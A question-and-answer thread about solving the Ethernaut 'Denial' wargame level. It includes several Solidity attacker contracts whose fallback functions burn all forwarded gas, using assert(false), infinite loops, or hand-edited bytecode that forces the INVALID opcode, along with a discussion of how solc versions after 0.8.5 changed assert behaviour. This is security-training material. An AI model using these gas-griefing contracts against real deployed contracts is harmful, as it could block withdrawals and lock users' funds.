# Ethernaut level 20 Denial probably no longer solvable. Why?

Tags: solidity, gas, security, out-of-gas, denial-of-service

I solved all levels of [Ethernaut](https://ethernaut.openzeppelin.com/) game except level 20 Denial: https://ethernaut.openzeppelin.com/level/0xcE1BB92eeb71AF5Fec09D38B0c854d55285f6e04

Eventually, I gave up and looked up the solution on the author's blog: https://github.com/sigp/solidity-security-blog#dos-vuln

I deployed the following contract on Rinkeby Test Network using Remix:

```
pragma solidity ^0.8.7;

contract DenialAttack {
    fallback() external payable {
        assert(false);
    }
}
```

The address of this contact is: `0x828F2073947a6d3De9caeEf48c7eCa989436a14B`

Then I created a fresh instance of Denial on Ethernaut. Next I called (from dev tools):

```
contract.setWithdrawPartner("0x828F2073947a6d3De9caeEf48c7eCa989436a14B")
```

I made sure that `partner` is successfully set to my attack contract. I submitted my instance but it told me that I haven't completed the level yet. Then I run (in dev tools in my Brave browser):

```
contract.withdraw()
```

And the transaction successfully completed. [Here](https://rinkeby.etherscan.io/tx/0xdc5546f332b1e019bb29103f0b22402e3238ea4916a479144068bf7adc89a61c) is how it looks on Etherscan.

Expected behavior is that I complete the level after submitting the instance and call to `withdraw` fails with out of gas error.

Ok, so this should be enough to reproduce the issue.

The idea here is that `partner.call.value(amountToSend)("");` passes all (or most?) gas to the callee contract (in my case to `DenialAttack`), then the callee contract burns all the gas and the execution of the whole transaction fails because the `Denial` contract has no gas left to finish the execution of `withdraw()`. Therefore we have achieved denial of service.

However, it seems that what actually happened is that `call` didn't pass all the gas to callee contract and enough gas was left to finish execution of `withdraw()`.

I've also tried other ways to burn all gas like iterating many times over a loop or doing something similar to described [here](https://ainevsia.github.io/2021/02/21/Ethernaut/). Nothing works.

My hypothesis is that this solution used to work but something has changed in Ethereum with how gas is passed when using `call` without specified gas limit and this level is no longer solvable. Maybe https://github.com/ethereum/EIPs/issues/114 is related?

My questions are: am I right? Is this level still solvable? If not, why? What did exactly change? When?

Thanks!

Comment: I'm bumping this since I'd also like to know. For what is worth, this contract could be reentrancy-attacked so that it no longer has funds when the owner wants to withdraw, but still not what the problem is asking.

Answer (score 5, accepted):

I saw the question thanks to the bounty and got really curious as to why it would not be possible... I'm not that far from level 20 so I jumped a few steps to try it.

The issue seems to be present for solidity > 0.8.5 only (tested using truffle) , I tested several versions in the range 0.6.0 to 0.8.5 (excluded) and the behavior is perfectly normal.

With a simple contract :

```
pragma solidity ^0.8.0;

contract TargetCall {
    
    fallback() external payable {
        assert(false);
    }
}
```

I saw the same behavior as you, it's a revert inside the call and not an assert, so execution can continue...

Looking into the bytecode I saw something curious :

`0x60806040526000601057600f6012565b5b005b7f4e487b7100000000000000000000000000000000000000000000000000000000600052600160045260246000fdfea264697066735822122022ef0b693779530b61308a11d0037e0882593e0cda55eb30d234198773a38f6464736f6c634300080a0033`

The assert is at : `fdfe` but in OPCODE view this is :

- 0xFD : REVERT
- 0xFE : INVALID (ASSERT FALSE)

I supposed that `assert(false)` was "optimized" to a simple `revert()` but no matter the conditions that I put in (even some that should not be optimizable..) it produced a similar bytecode (maybe I missed something though). If it were truly an optimization, why would the 0xFE invalid opcode even be there ?

My solution was to force an invalid OPCODE instead of the `revert()` :

So, modifying `fdfe` to `fefe` wich translates to :

- 0xFE INVALID (ASSERT FALSE)
- 0xFE INVALID (ASSERT FALSE)

Deploying this bytecode solves the challenge.

This contract is currently deployed on the Rinkeby network at : [0x2C68B51837c38B5f9B1e20acf607efed175B9BC7](https://rinkeby.etherscan.io/address/0x2C68B51837c38B5f9B1e20acf607efed175B9BC7#code)

> Is this level still solvable?

Yes !

> What did exactly change?

I suppose that solidity >0.8.5 behavior changed regarding assert() but I could not find specific informations allowing me to come up with a less dirty solution. If anyone has a proper explanation / link to change summary I'd be curious too !

PS : I will keep looking for a changelog explaining that behavior and edit my answer accordingly if I find anything.

Comment: As far as I can remember some version changed the assert behavior to be more like a revert, to not consume all available gas, not sure if it was a EVM version or a solc version that have the change.

Comment: Given that the bytecode is different it must be  solc right ? I managed to see the yul output that generated panic helpers where the revert is clearly present, i just didn't have the time to track it down to a specific issue yet..

Comment: A more readable way to force the INVALID opcode is to use some inline assembly:


assembly {
    invalid()
}

Answer (score 0):

Another solution to it is probably to use up all the gas inside our malicioc contract. It can be done with an infinite loop.
Create a contract A. Set A's address as the partner address. Call withdraw.

```
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Denial{
  function withdraw() external;
  function setWithdrawPartner(address _partner) external;
}


contract AlienCodex  {

    Denial denial;

    constructor(address _addr) {
        denial = Denial(_addr);
        denial.setWithdrawPartner(address(this));
    }
   

    fallback() payable external{
      uint a = 0;
      while(true)
      {
        a = a+1;
      }
    }
}
```

The only thing that I am not sure about is, why can't we use a re-entrancy attack here. Constantly calling withdraw() in a loop would also probably eat up all the gas. A simple re-entrancy that I tried out didn't work. Not sure though. The solution attached above works well though.

Answer (score 0):

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract AttackerContract {
    
    fallback() payable external {
        while(true){
            
        }
    }
    
}
```

This solution worked for me. It consumes all gas so execution never gets to the next line.

Comment: Exactly this solution also worked for me. An infinite while loop.